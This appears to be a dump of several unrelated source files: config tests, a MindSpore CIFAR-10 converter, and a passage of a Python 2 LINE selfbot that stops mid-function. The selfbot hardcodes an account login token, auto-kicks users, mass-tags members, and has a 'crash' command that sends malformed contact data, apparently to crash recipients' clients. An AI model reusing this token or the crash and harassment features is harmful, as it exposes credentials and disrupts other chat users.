_log.info('Could not update zonal DNS for %s', project)
self.results.report_error(project, 'update ' + self.name())
def main():
args = parse_args()
logging.basicConfig(
format="%(asctime)s %(levelname)s %(name)s] %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO)
Checker(args.config).run(args.filter, args.fix)
if __name__ == '__main__':
main()
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from staidelta.util.config import create_default_staidelta_config, initial_config_file, load_config, save_config
from staidelta.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_staidelta_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_staidelta_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_staidelta_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_staidelta_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_staidelta_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 56600
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
cifar10_to_mr.py
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
"""
A class to transform from cifar10 to MindRecord.
Args:
source (str): the cifar10 directory to be transformed.
destination (str): the MindRecord file path to transform into.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file.startswith("data_batch_"):
train_data_flag = True
if file.startswith("test_batch"):
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("data_batch_*")
if not test_data_flag:
raise PathNotExistsError("test_batch")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Execute transformation from cifar10 to MindRecord.
Args:
fields (list[str], optional): A list of index fields, e.g.["label"] (default=None).
Returns:
MSRStatus, whether cifar10 is successfully transformed to MindRecord.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar10_data = Cifar10(self.source, False)
cifar10_data.load_data()
images = cifar10_data.images
logger.info("train images: {}".format(images.shape))
labels = cifar10_data.labels
logger.info("train images label: {}".format(labels.shape))
test_images = cifar10_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_labels = cifar10_data.Test.labels
logger.info("test images label: {}".format(test_labels.shape))
data_list = _construct_raw_data(images, labels)
test_data_list = _construct_raw_data(test_images, test_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
def _construct_raw_data(images, labels):
"""
Construct raw data from cifar10 data.
Args:
images (list): image list from cifar10.
labels (list): label list from cifar10.
Returns:
list[dict], data dictionary constructed from cifar10.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
raw_data = []
for i, img in enumerate(images):
label = np.int(labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"label": int(label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): dict of raw data.
schema_desc (str): String of schema description.
Returns:
MSRStatus, whether successfully written into MindRecord.
"""
schema = {"id": {"type": "int64"}, "label": {"type": "int64"},
"data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
S14.py
|
# -*- coding: utf-8 -*-
import KRIS
from KRIS.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
kr = KRIS.LINE()
#kr.login(qr=True)
kr.login(token="EoMxIUUhy07LRc4ECkr5.nqZhqiZgZilGvU4eyth5jq.1Ij6rXBNjXEoOMC7MnB1PFTYOEmZzTfv8ExwSo/uCLY=")
kr.loginResult()
print "╠══TeamBotAdhi══╠"
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg =""" ╠══TeamBotAdhi══╠
╠═════════════
owner : ༺T-B-A༻ �
╠═════════════
google (text)
playstore (text)
instagram (username)
wikipedia (text)
idline (text)
time
image (text)
runtime
Restart
lirik (text)
Cancel on/off
Simisimi:on/off
Read on/off
Getinfo @
Getcontact @
Cium @
speed
Friendlist
keyset
keygrup
mode on/off
protect on/off
qr on/off
invite on/off
cancel on/off
Me
Myname:
Mybio:
Mypict
Mycover
My copy @
My backup
Getgroup image
Getmid @
Getprofile @
Getinfo @
Getname @
Getbio @
Getpict @
Getcover @
Sun (Mention)
Sider on/off (Lurking)
intip/Ciduk (Lurkers)
Micadd @
Micdel @
Mimic on/off
Miclist
╔═════════════
╔═════════════
╠owner : ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
helpset ="""╠══TeamBotAdhi══╠
╔═════════════
║║ Owner : ༺T-B-A༻
║╔════════════
contact on/off
autojoin on/off
auto leave on/off
autoadd on/off
like friend
link on
respon on/off
Read on/off
simisimi on/off
Datang on/off
Pamit on/off
Respontag on/off
Kicktag on/off
╠═════════════
╠Creator: ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
helpgrup ="""
╔═════════════
╠╠══TeamBotAdhi══╠
║line://ti/p/~jkp4678
║ Owner : ༺T-B-A༻ �
╠═════════════
Link on
Url
Cancel
Gcreator
Kick @
Cium @
Gname:
Gbroadcast:
Cbroadcast:
Infogrup
Gruplist
Friendlist
Blacklist
Ban @
Unban @
Clearban
Banlist
Contact ban
Midban
╠═════════════╠
Id@en
En@id
Id@jp
Jp@id
Id@th
Th@id
Id@ar
Ar@id
Id@ko
Ko@id
Say-id
Say-en
Say-jp
╠════════════
╠══TeamBotAdhi══╠
╠owner : ༺T-B-A༻ �
╠Creator by : ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
KAC=[kr]
mid = kr.getProfile().mid
Bots=[mid]
admin=["u350cc7408cc6cc82e056ee046131f925","uc2e8b426f6591045943eae5304e67c32",mid]
wait = {
"likeOn":False,
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":True,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"""Tanks For You add kak""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ 😊\n\n☆º°╠══TeamBotAdhi═)═_^ω^)\n╠══TeamBotAdhi══╠\n👈://line.me/ti/p/~jkp4678 «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames":"",
"cNames":"",
"Wc":False,
"Lv":False,
'MENTION':True,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = kr.getProfile()
backup = kr.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
kr.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
kr.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
kr.sendText(op.param1,str(wait["message"]))
if op.type == 25:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr.sendText(msg.to,text)
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in admin:
kr.acceptGroupInvitation(op.param1)
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kr.acceptGroupInvitation(op.param1)
else:
kr.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if op.type == 19:
if op.param3 in admin:
kr.kickoutFromGroup(op.param1,[op.param2])
kr.inviteIntoGroup(op.param1,admin)
kr.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
kr.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
kr.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
kr.acceptGroupInvitationByTicket(list_[1],list_[2])
G = kr.getGroup(list_[1])
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
kr.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
kr.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
kr.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
kr.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = kr.getContact(msg.from_)
cName = contact.displayName
balas = ["Don't Tag Me! iam Bussy!, ",cName + "Ada perlu apa, ?",cName + " pc aja klo urgent! sedang sibuk,", "kenapa, ", cName + " kangen?","kangen bilang gak usah tag tag, " + cName, "knp?, " + cName, "apasi?, " + cName + "?", "pulang gih, " + cName + "?","ada apa lo jones , ?" + cName + "Tersangkut -_-"]
ret_ = "." + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = kr.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Adhi lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr.sendText(msg.to,ret_)
kr.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr.findAndAddContactsByMid(target)
kr.inviteIntoGroup(msg.to,[target])
kr.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
kr.sendText(msg.to,"Error")
wait['invite'] = False
break
#if msg.contentType == 13:
# if wait["steal"] == True:
# _name = msg.contentMetadata["displayName"]
# copy = msg.contentMetadata["mid"]
# groups = kr.getGroup(msg.to)
# pending = groups.invitee
# targets = []
# for s in groups.members:
# if _name in s.displayName:
# print "[Target] Stealed"
# break
# else:
# targets.append(copy)
# if targets == []:
# pass
# else:
# for target in targets:
# try:
# kr.findAndAddContactsByMid(target)
# contact = kr.getContact(target)
# cu = kr.channel.getCover(target)
# path = str(cu)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
# kr.sendText(msg.to,"Profile Picture " + contact.displayName)
# kr.sendImageWithURL(msg.to,image)
# kr.sendText(msg.to,"Cover " + contact.displayName)
# kr.sendImageWithURL(msg.to,path)
# wait["steal"] = False
# break
# except:
# pass
if wait["alwayRead"] == True:
if msg.toType == 0:
kr.sendChatChecked(msg.from_,msg.id)
else:
kr.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
kr.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
kr.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
kr.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
kr.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
kr.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
kr.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
kr.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
kr.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
kr.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = kr.getContact(msg.contentMetadata["mid"])
try:
cu = kr.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = kr.getContact(msg.contentMetadata["mid"])
try:
cu = kr.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
kr.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
kr.sendText(msg.to,helpmsg)
else:
kr.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'keyset':
if wait["lang"] == "JP":
kr.sendText(msg.to,keyset)
else:
kr.sendText(msg.to,keyset)
elif msg.text.lower() == 'keygrup':
if wait["lang"] == "JP":
kr.sendText(msg.to,helpgrup)
else:
kr.sendText(msg.to,helpgrup)
# elif msg.text.lower() == 'keyself':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpself)
# else:
# kr.sendText(msg.to,helpself)
# elif msg.text.lower() == 'keygrup':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpgrup)
# else:
# kr.sendText(msg.to,helpgrup)
# elif msg.text.lower() == 'keyset':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpset)
# else:
# kr.sendText(msg.to,helpset)
# elif msg.text.lower() == 'keytran':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helptranslate)
# else:
# kr.sendText(msg.to,helptranslate)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
kr.sendText(msg.to, "❂➣Proses.....")
elapsed_time = time.time() - start
kr.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
kr.sendMessage(msg)
elif ".fb" in msg.text:
a = msg.text.replace(".fb","")
b = urllib.quote(a)
kr.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
kr.sendText(msg.to, "https://www.facebook.com" + b)
kr.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#======================== FOR COMMAND MODE ON STARTING ==========================#
elif msg.text.lower() == 'mode on':
if wait["protect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already On")
else:
kr.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
